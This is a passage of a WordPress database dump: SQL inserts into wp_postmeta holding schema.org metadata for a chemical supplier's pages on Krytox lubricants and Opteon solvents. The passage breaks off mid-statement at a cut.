INSERT INTO `wp_postmeta` VALUES (44471, 1416, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44472, 1446, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44475, 1638, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44476, 843, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44477, 1153, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44478, 337, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44479, 337, '_schema_json_timestamp', '1503121259'); 
INSERT INTO `wp_postmeta` VALUES (44481, 1997, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44484, 1821, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44485, 239, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44486, 239, '_schema_json_timestamp', '1503125727'); 
INSERT INTO `wp_postmeta` VALUES (44487, 3317, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44488, 3317, '_schema_json_timestamp', '1503126105'); 
INSERT INTO `wp_postmeta` VALUES (44490, 1606, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44491, 1606, '_schema_json_timestamp', '1503126174'); 
INSERT INTO `wp_postmeta` VALUES (44497, 1437, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44498, 1437, '_schema_json_timestamp', '1503129473'); 
INSERT INTO `wp_postmeta` VALUES (44500, 3302, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44501, 3302, '_schema_json_timestamp', '1503131702'); 
INSERT INTO `wp_postmeta` VALUES (44503, 1263, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44504, 738, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44505, 956, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44508, 2925, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44509, 2925, '_schema_json_timestamp', '1503138583'); 
INSERT INTO `wp_postmeta` VALUES (44512, 2317, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:65:"https://www.miller-stephenson.com/krytox-product-selection-guide/";}s:3:"url";s:65:"https://www.miller-stephenson.com/krytox-product-selection-guide/";s:8:"headline";s:30:"Krytox Product Selection Guide";s:13:"datePublished";s:25:"2016-10-06T15:56:55+00:00";s:12:"dateModified";s:25:"2016-10-12T19:53:11+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_419810209.jpg";s:5:"width";i:4273;s:6:"height";i:2849;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:26:"Krytox, Product, Selection";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:416:"Which Krytox product is right for your application? Krytox product(s) are perfluoropolyether oils and greases are available in a variety of grades for many types of applications. This Product Selection Guide provides general properties and cites the technical data reference document where additional information can be found. “Krytox Performance Lubricants Product Overview” gives basic information about";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44513, 1191, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44514, 1385, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44516, 3719, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44517, 3724, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44521, 2477, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44522, 2477, '_schema_json_timestamp', '1503142520'); 
INSERT INTO `wp_postmeta` VALUES (44525, 3710, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44526, 1115, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:63:"https://www.miller-stephenson.com/krytox-for-injection-molding/";}s:3:"url";s:63:"https://www.miller-stephenson.com/krytox-for-injection-molding/";s:8:"headline";s:28:"Krytox for Injection Molding";s:13:"datePublished";s:25:"2016-08-31T15:23:14+00:00";s:12:"dateModified";s:25:"2016-10-12T20:06:27+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/canstockphoto1519976.jpg";s:5:"width";i:2032;s:6:"height";i:2865;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:48:"BDX, BDZ, Grease, Injection Molding, Krytox, XHT";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:318:"“We have been using Krytox XHT-BDX for seven years now. We did a case study, and found out that we gained an additional 40% life between preventative maintenance (PM’s).” - A satisfied Krytox customer &nbsp; The Problem The Injection Molding industry for Tier 1 auto suppliers require hundreds of man hours in";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44529, 982, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44530, 982, '_schema_json_timestamp', '1503146511'); 
INSERT INTO `wp_postmeta` VALUES (44533, 400, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44534, 833, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44535, 833, '_schema_json_timestamp', '1503149508'); 
INSERT INTO `wp_postmeta` VALUES (44537, 4170, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44538, 889, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44539, 889, '_schema_json_timestamp', '1503151809'); 
INSERT INTO `wp_postmeta` VALUES (44540, 787, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44541, 787, '_schema_json_timestamp', '1503152591'); 
INSERT INTO `wp_postmeta` VALUES (44542, 1711, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44543, 2332, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44544, 1088, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44547, 992, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44548, 940, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44549, 436, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44552, 653, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44553, 1185, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44556, 672, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44562, 1925, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44564, 1188, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44566, 569, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44567, 569, '_schema_json_timestamp', '1503171746'); 
INSERT INTO `wp_postmeta` VALUES (44568, 3989, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44573, 2618, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:64:"https://www.miller-stephenson.com/opteon-sion-specialty-solvent/";}s:3:"url";s:64:"https://www.miller-stephenson.com/opteon-sion-specialty-solvent/";s:8:"headline";s:57:"Retrofit Guideline for Opteon™ Sion - Specialty Solvent";s:13:"datePublished";s:25:"2016-10-13T15:23:46+00:00";s:12:"dateModified";s:25:"2016-10-13T18:17:34+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_310575989.jpg";s:5:"width";i:3000;s:6:"height";i:2000;}s:14:"articleSection";s:35:"Opteon™ &amp; Vertrel™ Articles";s:8:"keywords";s:31:"Opteon, Sion, Specialty Solvent";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:412:"Introduction to Opteon™ Sion Specialty Solvent Opteon™ Sion specialty solvent is suitable to replace n-propyl bromide (nPB) and trichloroethylene (TCE) in applications demanding maximum cleaning power, including defluxing; oil, grease, and wax removal; and precision cleaning applications. Opteon™ Sion specialty solvent offers an excellent balance between cleaning performance, environmental impact, and";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44574, 1802, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44575, 1802, '_schema_json_timestamp', '1503175837'); 
INSERT INTO `wp_postmeta` VALUES (44576, 1698, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44578, 1898, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44581, 2324, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44582, 1009, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44584, 1073, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44585, 1164, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44587, 1334, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44588, 1334, '_schema_json_timestamp', '1503184796'); 
INSERT INTO `wp_postmeta` VALUES (44589, 1645, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44590, 1224, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44591, 694, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44592, 694, '_schema_json_timestamp', '1503186432'); 
INSERT INTO `wp_postmeta` VALUES (44594, 2450, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:67:"https://www.miller-stephenson.com/krytox-noise-vibration-harshness/";}s:3:"url";s:67:"https://www.miller-stephenson.com/krytox-noise-vibration-harshness/";s:8:"headline";s:53:"Krytox For Automotive Noise, Vibration, and Harshness";s:13:"datePublished";s:25:"2016-10-10T15:36:06+00:00";s:12:"dateModified";s:25:"2016-10-12T19:48:13+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_420231835.jpg";s:5:"width";i:6549;s:6:"height";i:4366;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:33:"Krytox, Noise Vibration Harshness";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:371:"Krytox™ Lubricants Can Help Solve Your Automotive Noise, Vibration, and Harshness issues. Inside an automobile’s interior, there are a variety of places where different materials come into contact with one another. Examples include metal on plastic, leather on leather, weather stripping, and many others. Movement between these surfaces often results in a series";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44595, 1056, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44597, 1172, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44598, 1172, '_schema_json_timestamp', '1503186911'); 
INSERT INTO `wp_postmeta` VALUES (44599, 962, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44602, 1178, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44603, 1646, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44604, 4102, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44605, 895, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44607, 951, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44608, 951, '_schema_json_timestamp', '1503192523'); 
INSERT INTO `wp_postmeta` VALUES (44609, 1759, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44610, 1152, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44614, 438, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44615, 1915, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44616, 1915, '_schema_json_timestamp', '1503196565'); 
INSERT INTO `wp_postmeta` VALUES (44617, 775, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44618, 775, '_schema_json_timestamp', '1503198763'); 
INSERT INTO `wp_postmeta` VALUES (44619, 4337, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44620, 4337, '_schema_json_timestamp', '1503199308'); 
INSERT INTO `wp_postmeta` VALUES (44621, 50, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44622, 50, '_schema_json_timestamp', '1503201736'); 
INSERT INTO `wp_postmeta` VALUES (44623, 51, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44624, 51, '_schema_json_timestamp', '1503201880'); 
INSERT INTO `wp_postmeta` VALUES (44626, 2800, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44627, 1683, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44628, 4092, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44629, 659, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44630, 1077, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44631, 1662, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44632, 862, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44633, 1111, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44634, 1654, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44635, 1654, '_schema_json_timestamp', '1503208368'); 
INSERT INTO `wp_postmeta` VALUES (44636, 1820, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44637, 1820, '_schema_json_timestamp', '1503210226'); 
INSERT INTO `wp_postmeta` VALUES (44638, 4187, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44639, 1068, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44640, 1068, '_schema_json_timestamp', '1503210866'); 
INSERT INTO `wp_postmeta` VALUES (44641, 2056, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:60:"https://www.miller-stephenson.com/krytox-ts4-thread-sealant/";}s:3:"url";s:60:"https://www.miller-stephenson.com/krytox-ts4-thread-sealant/";s:8:"headline";s:18:"TS4 Thread Sealant";s:13:"datePublished";s:25:"2016-09-28T13:43:08+00:00";s:12:"dateModified";s:25:"2017-02-23T15:23:17+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:89:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-ts4-threaded-pipe.jpg";s:5:"width";i:5810;s:6:"height";i:3844;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:28:"Krytox, Sealant, Thread, TS4";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:355:"[share title=""] Krytox TS4 Thread Sealant Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance.  High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations,";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44642, 1061, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44643, 1290, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44644, 1290, '_schema_json_timestamp', '1503265176'); 
INSERT INTO `wp_postmeta` VALUES (44645, 2786, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44646, 353, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44647, 353, '_schema_json_timestamp', '1503212695'); 
INSERT INTO `wp_postmeta` VALUES (44649, 3363, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44651, 2386, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44652, 2386, '_schema_json_timestamp', '1503213810'); 
INSERT INTO `wp_postmeta` VALUES (44653, 1168, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44654, 756, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44656, 1447, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44657, 1447, '_schema_json_timestamp', '1503215151'); 
INSERT INTO `wp_postmeta` VALUES (44658, 1067, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44660, 2768, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44661, 2046, '_schema_json', 'a:10:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:7:"Article";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:58:"https://www.miller-stephenson.com/sds-access-request-form/";}s:3:"url";s:58:"https://www.miller-stephenson.com/sds-access-request-form/";s:8:"headline";s:23:"SDS Access Request Form";s:13:"datePublished";s:25:"2016-09-28T12:31:44+00:00";s:12:"dateModified";s:25:"2016-09-28T13:19:25+00:00";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:126:"[row] [col span="6"] Please fill out form for SDS Access [/col] [col span="6"] [ninja_forms_display_form id="11"] [/col] [row]";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:20:"ddillulio@mschem.com";s:3:"url";s:61:"https://www.miller-stephenson.com/author/ddilluliomschem-com/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44662, 883, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44663, 883, '_schema_json_timestamp', '1503217250'); 
INSERT INTO `wp_postmeta` VALUES (44664, 1151, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44666, 1239, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44667, 1731, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44668, 1253, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44669, 1253, '_schema_json_timestamp', '1503219802'); 
INSERT INTO `wp_postmeta` VALUES (44674, 1418, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44675, 1104, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44676, 924, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44678, 1289, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44679, 1396, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44680, 1396, '_schema_json_timestamp', '1503225115'); 
INSERT INTO `wp_postmeta` VALUES (44682, 1444, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44686, 927, '_schema_json', 'a:10:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:7:"Article";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:45:"https://www.miller-stephenson.com/quote-list/";}s:3:"url";s:45:"https://www.miller-stephenson.com/quote-list/";s:8:"headline";s:10:"Quote List";s:13:"datePublished";s:25:"2016-08-26T19:29:23+00:00";s:12:"dateModified";s:25:"2016-08-26T19:29:23+00:00";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:20:"[quote_request_list]";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:20:"ddillulio@mschem.com";s:3:"url";s:61:"https://www.miller-stephenson.com/author/ddilluliomschem-com/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44687, 441, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44688, 410, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44689, 1431, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44691, 4289, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44692, 4289, '_schema_json_timestamp', '1503230499'); 
INSERT INTO `wp_postmeta` VALUES (44693, 671, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44694, 3346, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44695, 3346, '_schema_json_timestamp', '1503230694'); 
INSERT INTO `wp_postmeta` VALUES (44696, 2570, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44698, 4219, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:102:"https://www.miller-stephenson.com/radiation-stability-krytox-lubricants-fluoroguard-polymer-additives/";}s:3:"url";s:102:"https://www.miller-stephenson.com/radiation-stability-krytox-lubricants-fluoroguard-polymer-additives/";s:8:"headline";s:69:"Radiation Stability of Krytox™ and Fluoroguard™ Polymer Additives";s:13:"datePublished";s:25:"2017-05-16T18:20:07+00:00";s:12:"dateModified";s:25:"2017-05-16T18:20:07+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_568641832.jpg";s:5:"width";i:1000;s:6:"height";i:584;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:344:"Radiation Stability of Krytox™ and Fluoroguard™ Polymer Additives The results of some radiation stability exposure data obtained on our Krytox™ 143AB fluorinated oil and Krytox™ 240AB fluorinated grease that contains this oil are summarized in Tables 1–4. It is believed that these data are generally representative of the performance";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44699, 3741, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44700, 3741, '_schema_json_timestamp', '1503232002'); 
INSERT INTO `wp_postmeta` VALUES (44701, 707, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44703, 2569, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44707, 1690, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44708, 3448, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44713, 3036, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:69:"https://www.miller-stephenson.com/krytox-automotive-seat-lubrication/";}s:3:"url";s:69:"https://www.miller-stephenson.com/krytox-automotive-seat-lubrication/";s:8:"headline";s:42:"Krytox GPL 101 Automotive Seat Lubrication";s:13:"datePublished";s:25:"2016-11-15T19:30:16+00:00";s:12:"dateModified";s:25:"2016-11-15T19:45:03+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_230790487.jpg";s:5:"width";i:1000;s:6:"height";i:667;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:369:"Krytox Automotive Seat Lubrication A Brazilian supplier to the automotive industry improves customer and end-user satisfaction by using specialty lubricant. Automotive seat manufacturer in Brazil reduces squeaks A Brazilian manufacturer of automotive seats for luxury vehicles wanted to reduce complaints about squeaks to improve satisfaction among its direct customers";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (44715, 324, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44716, 324, '_schema_json_timestamp', '1503238267'); 
INSERT INTO `wp_postmeta` VALUES (44717, 845, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (44718, 845, '_schema_json_timestamp', '1503238331'); 
INSERT INTO `wp_postmeta` VALUES (44720, 2311, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:64:"https://www.miller-stephenson.com/krytox-agl-683-gearbox-grease/";}s:3:"url";s:64:"https://www.miller-stephenson.com/krytox-agl-683-gearbox-grease/";s:8:"headline";s:42:"Krytox AGL 683 Case Study - Gearbox Grease";s:13:"datePublished";s:25:"2016-10-06T14:17:55+00:00";s:12:"dateModified";s:25:"2016-10-12T19:54:59+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_319726019.jpg";s:5:"width";i:5191;s:6:"height";i:3461;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:43:"683, AGL, Aviation, Gearbox, Grease, Krytox";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:418:"Krytox AGL 683 Aviation Gear Box Grease - Case Study Aircraft Cabin Air Conditioning and Temperature Control System Application Aircraft systems manufacturer improves flying experience with help from custom lubricant. Aircraft systems manufacturer makes cabins more comfortable and reduces costly maintenance A systems manufacturer designed a cabin air conditioning and temperature control system for the 